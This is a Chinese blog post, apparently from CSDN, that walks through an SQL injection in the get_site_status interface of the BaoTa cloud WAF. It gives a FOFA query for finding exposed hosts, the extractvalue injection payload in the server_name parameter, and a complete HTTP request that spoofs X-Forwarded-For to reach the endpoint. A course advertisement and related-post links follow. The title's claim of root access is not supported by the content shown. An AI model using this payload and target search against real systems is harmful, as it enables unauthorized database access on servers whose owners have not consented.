【漏洞复现】宝塔WAF-get_site_status-SQL注入漏洞_宝塔waf 0day漏洞,可直接获取root权限(1)

最新推荐文章于 2024-07-10 15:42:54 发布
最新推荐文章于 2024-07-10 15:42:54 发布
阅读量458 收藏 7
点赞数 4
分类专栏: 程序员 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84972799/article/details/138794952
版权

免责声明

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

堡塔云 WAF 是广东堡塔安全技术有限公司的一款 WAF 产品。

堡塔云 WAF get_site_status 接口 server_name 参数存在 SQL注入漏洞,攻击者可利用此漏洞获取数据库敏感信息。

影响范围

堡塔云 WAF

资产测绘

FOFA:

title==“404 - Website not exist!”
“宝塔”

漏洞复现

SQL注入漏洞存在于 server_name参数处
URL地址改为:

/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'

修改HOST,并新增X-Forwoarded-For改为:127.0.0.251
X-Forwarded-For: 127.0.0.1

GET /get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-' HTTP/2
Host: 127.0.0.251
X-Forwarded-For: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

image
image
image

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84972799
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
宝塔WAF-get_site_status-SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-01 342
宝塔WAF-get_site_status-SQL注入漏洞(含批量验证poc)
宝塔计划任务访问url_宝塔面板漏洞复现
weixin_39520353的博客
11-18 990
一、漏洞介绍0x01 宝塔介绍 宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能。0x02 漏洞介绍 宝塔的特定版本存在phpmyadmin未授权访问漏洞,攻击者可以通过...
漏洞复现宝塔WAF-get_site_status-SQL注入漏洞
Nday_Seeker
03-15 821
堡塔云 WAF get_site_status 接口 server_name 参数存在 SQL注入漏洞,攻击者可利用此漏洞获取数据库敏感信息。
秘密-宝塔漏洞复现-详细网安教程
最新发布
2401_84915584的博客
07-10 468
扫码领资料获网安教程本文由掌控安全学院 -caih投稿前几天找到个可以上传任意文件的上传点,成功上传phpinfo页面并能访问,但是不能成功上传一句话
宝塔漏洞复现
热门推荐
黑白的博客
09-06 1万+
声明 好好学习,天天向上 漏洞描述 宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能 该漏洞是phpmyadmin未鉴权,可通过特定地址直接登录数据库漏洞 影响范围 宝塔Linux面板7.4.2版本 宝塔Linux测试版7.5.13 Windows面板6.8版本 复现过程 漏洞镜像可以用docker获取 先配置加速器(公
宝塔WAF-get_site_status-SQL注入漏洞(含批量验证poc)_堡塔云waf存在sql注入(1)
2301_77118221的博客
04-16 436
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
宝塔7.4.2漏洞复现
震山的博客
08-20 1812
复现宝塔当时广为流传的 pma 非授权访问漏洞
宝塔WAF-get_site_status-SQL注入漏洞(含批量验证poc)_堡塔云waf存在sql注入
2301_76225520的博客
04-20 620
个人可以走的很快,但一群人才能走的更远!当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。最后就是大家最关心的网络安全面试题板块。
skydeep-waf-trial_waf_
10-01
强大的waf软件
waf-fle_0.6.4.tar.gz
12-11
waf-fle_0.6.4.tar.gz” 是一个软件的压缩包文件,其中“waf-fle”可能是该软件的缩写,代表“Web Application Firewall - Flexible Logging and Event Management”的意思,暗示这是一款与Web应用防火墙(WAF)...
ngx_lua_waf-master.zip_lua_nearly11h_nginx_ngx_lua_waf
09-21
WAF(Web Application Firewall)是专门针对Web应用的安全防护工具,它可以检测并阻止SQL注入、跨站脚本攻击(XSS)、命令注入等常见的Web攻击。ngx_lua_waf使用Lua编写,可以实现动态规则检查、请求参数过滤、IP...
PC版宝塔漏洞批量扫描软件2020版
08-27
1.单个扫描只扫描域名列表第一个 2.批量扫描则扫描全部。 使用须知: 本程序只对未更新宝塔的用户有效, 如果扫出来的地址进不去,说明改网站宝塔版本已经更新了。
最新宝塔7.4.2漏洞复现
明哥哥知识分享
09-09 828
复现地址:本机环境 复现版本:7.4.6破解到7.4.2 访问宝塔面板,会提示用随机生成的入口才能访问,这里不需要这个入口。 我这里本地复现的版本是是7.4.6,这个是在网上找的破解版,能够复现7.4.2的漏洞。 输入ip:端口/pma 就直接进入到了phpmyadmin,正常情况下是无法访问的,这里出现了未授权直接进入到了数据库,这就非常危险了。 官方修复建议是升级,此次影响的版本是linux面板7.4.2,windows面板6.8,并且安装了phpmyadmin,或者禁止访问888端口。 免责声明
宝塔+dedecms 文件上传漏洞bypass复现
2301_80127209的博客
04-18 746
知道,1方面要对小马进行base64编码, 另外一方面要对蚁剑进行魔改。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。1,我先找的资料,是蚁剑的绕过disable_function。可以发现, 规则,对get,post ,cookie,等方式的eval,还有base64都进行了过滤。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。千万要注意的是,这个得选择这个。
phpmyadmin漏洞_宝塔phpmyadmin未授权访问漏洞复现
weixin_39954908的博客
12-06 1341
0x01 介绍宝塔宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能。Phpmyadmin:phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具...
网传宝塔0day”挂马事件—附检测脚本
afei001
12-18 1349
宝塔面板疑似出现重大安全漏洞。遭到攻击的服务器,Nginx会自动检测header中accept字段是否包含Gzip。如果包含,则会向目标页面中加入一段JS引用,从而实现恶意挂马。
WAF绕过漏洞利用——漏洞利用之注入上传跨站等绕过
m0_61506558的博客
10-05 1087
这里介绍常见的漏洞利用绕过的方法,方法有很多很多,一定要有自己的思想,就拿逻辑漏洞来说,AWVS、AppScan、Xray、Nessus、Sqlmap......这些自动化工具是扫描不出来的,加密编码绕过?算法可逆?关键字绕过?提交方法?各种测试?要学会尝试自己造轮子,本篇文章引入几种简单方式,希望打开大家思路之前简单总结过,感兴趣的(一)SQL注入
浅谈宝塔渗透手法,从常见漏洞 聊到 宝塔维权 再到 bypass disable_functions原理
milu_Sec的博客
12-31 4697
公网无需鉴权直接 root 权限进入 phpmyadmin,IP或域名地址:888/pma为什么要介绍这个洞呢,因为phpmyadmin这里好做文章,常见手法有into outfile写shell,日志get shell,UDF getshell,MOF提权,网上教程一大堆,这里麋鹿就不浪费大家时间了,不熟悉的读者可以百度一下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值